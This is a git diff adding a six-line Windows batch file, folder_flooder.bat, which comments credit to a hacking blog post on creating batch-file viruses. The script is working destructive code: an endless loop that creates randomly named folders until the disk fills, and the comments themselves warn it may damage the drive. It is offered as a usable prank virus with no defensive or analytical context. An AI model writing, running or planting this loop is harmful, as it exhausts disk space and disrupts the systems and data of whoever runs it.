diff --git a/folder_flooder.bat b/folder_flooder.bat new file mode 100644 index 0000000..5c6c3db --- /dev/null +++ b/folder_flooder.bat @@ -0,0 +1,6 @@ +:: Source- http://www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html +:: Creates a lot of folders on the disk. Running it for long time may crush hard-disk. + +:x +md %random%%random% +goto x